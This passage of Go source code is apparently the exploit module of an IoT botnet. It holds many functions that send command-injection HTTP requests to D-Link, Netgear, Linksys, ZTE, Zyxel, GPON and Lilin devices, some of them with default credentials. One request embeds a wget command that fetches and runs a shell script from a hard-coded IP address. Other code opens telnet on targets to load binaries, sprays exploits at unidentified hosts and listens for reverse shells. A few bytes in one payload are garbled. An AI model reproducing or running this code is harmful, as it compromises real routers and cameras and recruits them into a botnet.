        	fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2262
            payloadSent++
2263
            break
2264
        } else {
2265
            zeroByte(bytebuf)
2266
            conn.Close()
2267
            continue
2268
        }
2269
    }
2270

2271
    if (pathPos != -1) {
2272

2273
        conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2274
        if err != nil {
2275
            return
2276
        }
2277

2278
        conn.Write([]byte("POST " + paths[pathPos] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: 281\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><SetConfiguration File=\"service.xml\"><![CDATA[<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><Service><NTP Enable=\"True\" Interval=\"20000\" Server=\"time.nist.gov\"/></Service></DVR>]]></SetConfiguration></DVR>\r\n\r\n"))
2279

2280
        bytebuf = make([]byte, 2048)
2281
        l, err := conn.Read(bytebuf)
2282
        if err != nil || l <= 0 {
2283
            zeroByte(bytebuf)
2284
            conn.Close()
2285
            return
2286
        }
2287

2288
        if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
2289
        	fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2290
            payloadSent++
2291
        }
2292

2293
        zeroByte(bytebuf)
2294
        conn.Close()
2295
    }
2296

2297
    return
2298
}
2299

2300
func infectFunctionLinksys(target string) {
2301

2302
    var rdbuf []byte = []byte("")
2303
 
2304
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2305
    if err != nil {
2306
        return
2307
    }
2308
 
2309
    var cntLen int = 102
2310
    cntLen += len(linksysPayload)
2311

2312
    cntLneStr := strconv.Itoa(cntLen)
2313

2314
    conn.Write([]byte("POST /tmUnblock.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + cntLneStr + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nsubmit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60" + linksysPayload + "%60&StartEPI=1\r\n\r\n"))
2315
    
2316
    tmpbuf := make([]byte, 128)
2317
    ln, err := conn.Read(tmpbuf)
2318
    if ln <= 0 || err != nil {
2319
        conn.Close()
2320
    }
2321

2322
    if strings.Contains(string(tmpbuf), "200") || strings.Contains(string(tmpbuf), "301") || strings.Contains(string(tmpbuf), "302") {
2323
    	fmt.Printf("\x1b[38;5;46mLinksys\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
2324
    }
2325

2326
    zeroByte(rdbuf)
2327
    conn.Close()
2328
}
2329

2330
func infectFunctionMagic(target string) {
2331

2332
    ipslit := strings.Split(target, ":")
2333

2334
    for i := 0; i < len(magicPorts); i++ {
2335
        portVal := strconv.Itoa(magicPorts[i])
2336
        magicGroup.Add(1)
2337
        go infectFunctionMagicProto(ipslit[0] + ":" + portVal)
2338
    }
2339

2340
    magicGroup.Wait()
2341
}
2342

2343
func infectFunctionDlink(target string) {
2344

2345
    var rdbuf []byte = []byte("")
2346
 
2347
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2348
    if err != nil {
2349
        return
2350
    }
2351
 	
2352
 	rand.Seed(time.Now().UnixNano())
2353
    telnetPort := rand.Intn(50000) + 10000
2354

2355
    conn.Write([]byte("POST /command.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 24\r\n\r\ncmd=telnetd%20-p%20" + strconv.Itoa(telnetPort) + "\r\n\r\n"))
2356
    
2357
    tmpbuf := make([]byte, 128)
2358
    ln, err := conn.Read(tmpbuf)
2359
    if ln <= 0 || err != nil {
2360
        conn.Close()
2361
    }
2362

2363
    time.Sleep(10 * time.Second)
2364
    ipslit := strings.Split(target, ":")
2365
    go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderDlinkTag)
2366
    go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mpsl", loaderDlinkTag)
2367
    go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm7", loaderDlinkTag)
2368
    go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm", loaderDlinkTag)
2369
    zeroByte(rdbuf)
2370
    conn.Close()
2371
}
2372

2373
func infectFunctionZyxelTwo(target string) {
2374

2375
    var rdbuf []byte = []byte("")
2376
 
2377
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2378
    if err != nil {
2379
        return
2380
    }
2381
 	
2382
 	var cntLen int = 119
2383
 	cntLen += len(zyxelPayloadTwo)
2384

2385
    conn.Write([]byte("POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozia/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nremote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3B" + zyxelPayloadTwo + "%3B%23&remoteSubmit=Save^[[A\r\n\r\n"))
2386

2387
    tmpbuf := make([]byte, 128)
2388
    ln, err := conn.Read(tmpbuf)
2389
    if ln <= 0 || err != nil {
2390
        conn.Close()
2391
    }
2392

2393
    zeroByte(rdbuf)
2394
    conn.Close()
2395
}
2396

2397
func infectFunctionNetgear(target string) {
2398

2399
    var rdbuf []byte = []byte("")
2400
 
2401
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2402
    if err != nil {
2403
        return
2404
    }
2405
 	
2406
 	var cntLen int = 42
2407
 	cntLen += len(netgearPayload)
2408

2409
    conn.Write([]byte("POST /dnslookup.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nhost_name=www.google.com%3B+" + netgearPayload + "&lookup=Lookup\r\n\r\n"))
2410

2411
    tmpbuf := make([]byte, 128)
2412
    ln, err := conn.Read(tmpbuf)
2413
    if ln <= 0 || err != nil {
2414
        conn.Close()
2415
    }
2416

2417
    zeroByte(rdbuf)
2418
    conn.Close()
2419
}
2420

2421
func infectFunctionZte(target string) {
2422

2423
    var rdbuf []byte = []byte("")
2424
 
2425
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2426
    if err != nil {
2427
        return
2428
    }
2429
 	
2430
 	var cntLen int = 80
2431
 	cntLen += len(ztePayload)
2432

2433
    conn.Write([]byte("POST /web_shell_cmd.gch HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=" + ztePayload + "&CmdAck=\r\n\r\n"))
2434

2435
    tmpbuf := make([]byte, 128)
2436
    ln, err := conn.Read(tmpbuf)
2437
    if ln <= 0 || err != nil {
2438
        conn.Close()
2439
    }
2440

2441
    zeroByte(rdbuf)
2442
    conn.Close()
2443
}
2444

2445
func infectFunctionNetgearTwo(target string) {
2446

2447
    var rdbuf []byte = []byte("")
2448
 
2449
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2450
    if err != nil {
2451
        return
2452
    }
2453
 	
2454
    conn.Write([]byte("GET /None?writeData=true&reginfo=0&macAddress=%20001122334455%20-c%200%20;" + netgearPayload + ";%20echo%20 HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
2455

2456
    tmpbuf := make([]byte, 128)
2457
    ln, err := conn.Read(tmpbuf)
2458
    if ln <= 0 || err != nil {
2459
        conn.Close()
2460
    }
2461

2462
    zeroByte(rdbuf)
2463
    conn.Close()
2464
}
2465

2466
func infectFunctionNetgearThree(target string) {
2467

2468
    var rdbuf []byte = []byte("")
2469
 
2470
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2471
    if err != nil {
2472
        return
2473
    }
2474
 	
2475
 	var cntLen int = 81
2476
 	cntLen += len(netgearPayload)
2477

2478
    conn.Write([]byte("POST /ping.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nreferer: " + target + "/DIAG_diag.htm\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nIPAddr1=12&IPAddr2=12&IPAddr3=12&IPAddr4=12&ping=Ping&ping_IPAddr=12.12.12.12%3B+" + netgearPayload+ "\r\n\r\n"))
2479

2480
    tmpbuf := make([]byte, 128)
2481
    ln, err := conn.Read(tmpbuf)
2482
    if ln <= 0 || err != nil {
2483
        conn.Close()
2484
    }
2485

2486
    zeroByte(rdbuf)
2487
    conn.Close()
2488
}
2489

2490
func infectFunctionNetgearFour(target string) {
2491

2492
    var rdbuf []byte = []byte("")
2493
 
2494
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2495
    if err != nil {
2496
        return
2497
    }
2498
 	
2499
    conn.Write([]byte("GET /cgi-bin/;" + netgearPayload + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
2500

2501
    tmpbuf := make([]byte, 128)
2502
    ln, err := conn.Read(tmpbuf)
2503
    if ln <= 0 || err != nil {
2504
        conn.Close()
2505
    }
2506

2507
    zeroByte(rdbuf)
2508
    conn.Close()
2509
}
2510

2511
func infectFunctionGponOG(target string) {
2512

2513
    var rdbuf []byte = []byte("")
2514
 
2515
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2516
    if err != nil {
2517
        return
2518
    }
2519
 	
2520
 	var cntLen int = 68
2521
 	cntLen += len(gponOGPayload)
2522

2523
    conn.Write([]byte("POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=%60" + gponOGPayload + "&ipv=0\r\n\r\n"))
2524

2525
    tmpbuf := make([]byte, 128)
2526
    ln, err := conn.Read(tmpbuf)
2527
    if ln <= 0 || err != nil {
2528
        conn.Close()
2529
    }
2530

2531
    zeroByte(rdbuf)
2532
    conn.Close()
2533
}
2534

2535
func infectFunctionLinksysTwo(target string) {
2536

2537
    var rdbuf []byte = []byte("")
2538
 
2539
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2540
    if err != nil {
2541
        return
2542
    }
2543
 	
2544
 	var cntLen int = 159
2545
 	cntLen += len(linksysTwoPayload)
2546

2547
    conn.Write([]byte("POST /apply.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=127.0.0.1&ping_size=%26" + linksysTwoPayload + "&ping_times=5&traceroute_ip=127.0.0.1\r\n\r\n"))
2548

2549
    tmpbuf := make([]byte, 128)
2550
    ln, err := conn.Read(tmpbuf)
2551
    if ln <= 0 || err != nil {
2552
        conn.Close()
2553
    }
2554

2555
    zeroByte(rdbuf)
2556
    conn.Close()
2557
}
2558

2559
func infectFunctionLinksysThree(target string) {
2560

2561
    var rdbuf []byte = []byte("")
2562
 
2563
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2564
    if err != nil {
2565
        return
2566
    }
2567
 	
2568
 	var cntLen int = 23
2569
 	cntLen += len(linksysTwoPayload)
2570

2571
    conn.Write([]byte("POST /debug.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: python-requests/2.21.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic R2VtdGVrOmdlbXRla3N3ZA==\r\n\r\ndata1=" + linksysTwoPayload + "&command=ui_debug\r\n\r\n"))
2572

2573
    tmpbuf := make([]byte, 128)
2574
    ln, err := conn.Read(tmpbuf)
2575
    if ln <= 0 || err != nil {
2576
        conn.Close()
2577
    }
2578

2579
    zeroByte(rdbuf)
2580
    conn.Close()
2581
}
2582

2583
func infectFunctionDlinkTwo(target string) {
2584

2585
    var rdbuf []byte = []byte("")
2586
 
2587
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2588
    if err != nil {
2589
        return
2590
    }
2591
 	
2592
 	var cntLen int = 91
2593
 	cntLen += len(dlinkTwoPayload)
2594

2595
    conn.Write([]byte("POST /setSystemCommand HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nAuthorization: Basic YWRtaW46\r\n\r\nReplySuccessPage=docmd.htm&ReplyErrorPage=docmd.htm&SystemCommand=" + dlinkTwoPayload + "&ConfigSystemCommand=Save\r\n\r\n"))
2596

2597
    tmpbuf := make([]byte, 128)
2598
    ln, err := conn.Read(tmpbuf)
2599
    if ln <= 0 || err != nil {
2600
        conn.Close()
2601
    }
2602

2603
    zeroByte(rdbuf)
2604
    conn.Close()
2605
}
2606

2607
func infectFunctionDlinkThree(target string) {
2608

2609
    var rdbuf []byte = []byte("")
2610
 
2611
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2612
    if err != nil {
2613
        return
2614
    }
2615
 	
2616
 	var cntLen int = 20
2617
 	cntLen += len(dlinkTwoPayload)
2618

2619
    conn.Write([]byte("POST /diagnostic.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\n\r\nact=ping&dst=%26 " + dlinkTwoPayload + "%26\r\n\r\n"))
2620
    
2621
    tmpbuf := make([]byte, 128)
2622
    ln, err := conn.Read(tmpbuf)
2623
    if ln <= 0 || err != nil {
2624
        conn.Close()
2625
    }
2626

2627
    zeroByte(rdbuf)
2628
    conn.Close()
2629
}
2630

2631
func infectFunctionDlinkFour(target string) {
2632

2633
    var rdbuf []byte = []byte("")
2634
 
2635
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2636
    if err != nil {
2637
        return
2638
    }
2639
 	
2640
    conn.Write([]byte("GET /cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;" + dlinkTwoPayload +";echo%207yeB8BQB2ycGRCT8LmsmttUWPggWykhK; HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
2641
    
2642
    tmpbuf := make([]byte, 128)
2643
    ln, err := conn.Read(tmpbuf)
2644
    if ln <= 0 || err != nil {
2645
        conn.Close()
2646
    }
2647

2648
    zeroByte(rdbuf)
2649
    conn.Close()
2650
}
2651

2652
func infectFunctionDlinkFive(target string) {
2653

2654
    var rdbuf []byte = []byte("")
2655
 
2656
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2657
    if err != nil {
2658
        return
2659
    }
2660
 	
2661
    conn.Write([]byte("GET /login.cgi?cli=multilingual%20show';" + dlinkTwoPayload + "'$ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
2662
    
2663
    tmpbuf := make([]byte, 128)
2664
    ln, err := conn.Read(tmpbuf)
2665
    if ln <= 0 || err != nil {
2666
        conn.Close()
2667
    }
2668

2669
    zeroByte(rdbuf)
2670
    conn.Close()
2671
}
2672

2673
func infectFunctionDlinkSix(target string) {
2674

2675
    var rdbuf []byte = []byte("")
2676
 
2677
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2678
    if err != nil {
2679
        return
2680
    }
2681
 	
2682
    conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nCookie: i=`" + dlinkTwoPayload + "`\r\n\r\n"))
2683
    
2684
    tmpbuf := make([]byte, 128)
2685
    ln, err := conn.Read(tmpbuf)
2686
    if ln <= 0 || err != nil {
2687
        conn.Close()
2688
    }
2689

2690
    zeroByte(rdbuf)
2691
    conn.Close()
2692
}
2693

2694
func infectFunctionDlinkSeven(target string) {
2695

2696
    var rdbuf []byte = []byte("")
2697
 
2698
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2699
    if err != nil {
2700
        return
2701
    }
2702
 	
2703
    conn.Write([]byte("POST /hedwig.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: uid=uAMwOEeRuqDZptt4JHrQuakNv2g3eR9kqnvDUvAkaRD561YFVty3uXFAls6bcARYA5w5KpUrDlY7pdAXuG0AuhHSfBCQJoPDqxdjszcAWwQYxOEf6Sy9t8iU4PV1xNyVxDMPqZwR7a5dthsW8jLiK0ha1qUksjWYna5IaYoOYIM7aiT3mrseuskJWVONKXFQQw64tNsAAmrfIc9OobZ4gxQibsOsHkZoqz5C1ScGYmMaWeICXuF1J2R1FIzGkXOr3OXjKXQ8C6ZeSbRRmEBF8GaJPJ87wiVlDAXj6QsyKSWDzjqTWqS9rxBnx39xwO9e02kJibbjxAW93SsX7rfKmUH4hN0H1j8dqYGhpPWL0CSELCM7NwWSjs5ofrkRivAE5bI3rnlSsMeyvPGmRjGhSH6Z5kWDAVQ5bUztFAALVyl0nPl9fl2FgmLNCPmqx9VMNMsFTnOfv4hVP9wNiN1WYTeHRCrLeB9THv1uzipH8utX2Y7Cv5iaxSMYZOUVG2puqPAYc2QzfdkEgrIOuIOZIUXQvYGF35rIkMW8eYuiVKqejKbXaM8B6RfiBTCTAHJpRMnkp5L9HorqZNwX6lpyH62slJG4iS3Yz31SrgBV5PDANkFw92G6qtT8kvbHfzoI2kyJKQa67TSDHhZLgfUHMsFFLwZTZwiXlZIzDFimYbdTaz8KWF0POFoqyGs5oynMDic8VvwS2rGsALvVHYWa885i4CIrwyEOnkY6Mqvmv96osjP1Br3GWARZPpnwGoWc7dVLvZVDLW1ObRFg1bX8qDUdxv4jcGGwZdK5wz2bJoNoyEWIkFVcQldDxjaQNdokjCmJxoEGRUGYyZshnx1fYqLH3Mc3K9DcB7xhZdbdBAohXpzYr7OXpTFHZp7THrBE1i8VvvoaF1bBXsBrasf4fwYtVUrtgPHVnlq1oN2uoO6qfLZLz49u1QxK6qBGsQG2pJa6rxYmcHEPt���*vk3aG0Vgy2692qgW�ٰ*crxdla7qucxf�ذ*qzoFOTyzL063ZRDecd /tmp;wget http://37.0.11.220/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh;\r\nContent-Length: 15\r\n\r\nL0PTJUj=NX9zke5\r\n\r\n"))
2704
    
2705
    tmpbuf := make([]byte, 128)
2706
    ln, err := conn.Read(tmpbuf)
2707
    if ln <= 0 || err != nil {
2708
        conn.Close()
2709
    }
2710

2711
    zeroByte(rdbuf)
2712
    conn.Close()
2713
}
2714

2715
func infectFunctionDlinkEight(target string) {
2716

2717
    var rdbuf []byte = []byte("")
2718
 
2719
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
2720
    if err != nil {
2721
        return
2722
    }
2723
 	
2724
    conn.Write([]byte("POST /HNAP1/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && " + dlinkThreePayload + "`\"\r\nContent-Length: 0\r\n\r\n"))
2725
    
2726
    tmpbuf := make([]byte, 128)
2727
    ln, err := conn.Read(tmpbuf)
2728
    if ln <= 0 || err != nil {
2729
        conn.Close()
2730
    }
2731

2732
    zeroByte(rdbuf)
2733
    conn.Close()
2734
}
2735

2736

2737
func scannerAddExploit(name string, function interface{}) {
2738

2739
    exploitMap[name] = function
2740
}
2741

2742
func scannerInitExploits() {
2743

2744
    exploitMap = make(map[string]interface{})
2745

2746
    scannerAddExploit("Basic realm=\"DVR\"", infectFunctionLilinDvr)
2747
    scannerAddExploit("uc-httpd 1.0.0", infectFunctionUchttpd)
2748
    scannerAddExploit("AuthInfo:", infectFunctionTvt)
2749
    scannerAddExploit("CMS Web Viewer", infectFunctionMagic)
2750
    scannerAddExploit("Server: GoAhead-Webs", infectFunctionFiberhome)
2751
    scannerAddExploit("Server: DWS", infectFunctionVigor)
2752
    scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionComtrend)
2753
    scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionBroadcom)
2754
    scannerAddExploit("Server: Boa/0.93.15", infectFunctionGponFiber)
2755
    scannerAddExploit("TOTOLINK", infectFunctionTotolink)
2756
    scannerAddExploit("Server: Boa/0.94.14", infectFunctionRealtek)
2757
    scannerAddExploit("Basic realm=\"Server Status\"", infectFunctionHongdian)
2758
    scannerAddExploit("Server: Http Server", infectFunctionTenda)
2759
    scannerAddExploit(",/playzone,/", infectFunctionZyxel)
2760
    scannerAddExploit("Linksys E", infectFunctionLinksys)
2761

2762
    // Exploit spray for devices we cant identify
2763
    scannerAddExploit("HTTP/1.", infectFunctionAlcatel)
2764
    scannerAddExploit("HTTP/1.", infectFunctionZyxelTwo)
2765
    scannerAddExploit("HTTP/1.", infectFunctionZte)
2766
    scannerAddExploit("HTTP/1.", infectFunctionNetgear)
2767
    scannerAddExploit("HTTP/1.", infectFunctionNetgearTwo)
2768
    scannerAddExploit("HTTP/1.", infectFunctionNetgearThree)
2769
    scannerAddExploit("HTTP/1.", infectFunctionNetgearFour)
2770
    scannerAddExploit("HTTP/1.", infectFunctionGponOG)
2771
    scannerAddExploit("HTTP/1.", infectFunctionLinksysTwo)
2772
    scannerAddExploit("HTTP/1.", infectFunctionLinksysThree)
2773
    scannerAddExploit("HTTP/1.", infectFunctionDlink)
2774
    scannerAddExploit("HTTP/1.", infectFunctionDlinkTwo)
2775
    scannerAddExploit("HTTP/1.", infectFunctionDlinkThree)
2776
    scannerAddExploit("HTTP/1.", infectFunctionDlinkFour)
2777
    scannerAddExploit("HTTP/1.", infectFunctionDlinkFive)
2778
    scannerAddExploit("HTTP/1.", infectFunctionDlinkSix)
2779
    scannerAddExploit("HTTP/1.", infectFunctionDlinkSeven)
2780
    scannerAddExploit("HTTP/1.", infectFunctionDlinkEight)
2781
    
2782
}
2783

2784
func httpBannerCheck(target string) {
2785

2786
    conn, err := net.DialTimeout("tcp", target, netTimeout * time.Second)
2787
    if err != nil {
2788
        workerGroup.Done()
2789
        return
2790
    }
2791

2792
    conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\n\r\n"))
2793

2794
    for {
2795
        bytebuf := make([]byte, 2048)
2796
        l, err := conn.Read(bytebuf)
2797
        if err != nil || l <= 0 {
2798
            zeroByte(bytebuf)
2799
            conn.Close()
2800
            workerGroup.Done()
2801
            return
2802
        }
2803

2804
        for key, element := range exploitMap {
2805
            if strings.Contains(string(bytebuf), key) {
2806
                switch function := element.(type) {
2807
                    case func(string):
2808
                        function(target)
2809
                    default:
2810
                        break
2811
                }
2812
            }
2813
        }
2814
    }
2815

2816
    workerGroup.Done()
2817
    return
2818
}
2819

2820
func main() {
2821

2822
    go func() {
2823
    	i := 0
2824
    	for {
2825
    		fmt.Printf("%d's | Payload Sent: %d | Telnet Opened: %d\r\n", i, payloadSent, telShells)
2826
    		time.Sleep(1 * time.Second)
2827
    		i++
2828
    	}
2829
    } ()
2830

2831
    dropperMap = make(map[string]echoDropper)
2832
    telnetLoadDroppers()
2833
    scannerInitExploits()
2834

2835
    li, err := net.Listen("tcp", "0.0.0.0:" + strconv.Itoa(ucRshellPort))
2836
	if err != nil {
2837
		return
2838
	}
2839

2840
    recvServ, err := net.Listen("tcp", "0.0.0.0:19412")
2841
	if err != nil {
2842
		return
2843
	}
2844

2845
	go func() {
2846
		for {
2847
			conn, err := li.Accept()
2848
			if err != nil {
2849
				break
2850
			}
2851

2852
			go reverseShellUchttpdLoader(conn)
2853
		}
2854
	} ()
2855

2856
	go func() {
2857
		for {
2858
			conn, err := recvServ.Accept()
2859
			if err != nil {
2860
				break
2861
			}
2862

2863
			for {
2864
				buf := make([]byte, 32)
2865
				l, err := conn.Read(buf)
2866
				if l <= 0 || err != nil {
2867
					conn.Close()
2868
					break
2869
				}
2870

2871
                workerGroup.Add(1)
2872
	    	    go httpBannerCheck(string(buf))
2873
			}
2874
		}
2875
	} ()
2876

2877
    for {
2878
        reader := bufio.NewReader(os.Stdin)
2879
	    input := bufio.NewScanner(reader)
2880

2881
	    for input.Scan() {
2882
            if os.Args[1] == "listen" {
2883
                workerGroup.Add(1)
2884
	    	    go httpBannerCheck(input.Text())
2885
            } else {
2886
                workerGroup.Add(1)
2887
                go httpBannerCheck(input.Text() + ":" + os.Args[1])
2888
            }
2889
	    }
2890
    }
2891
}
2892

2893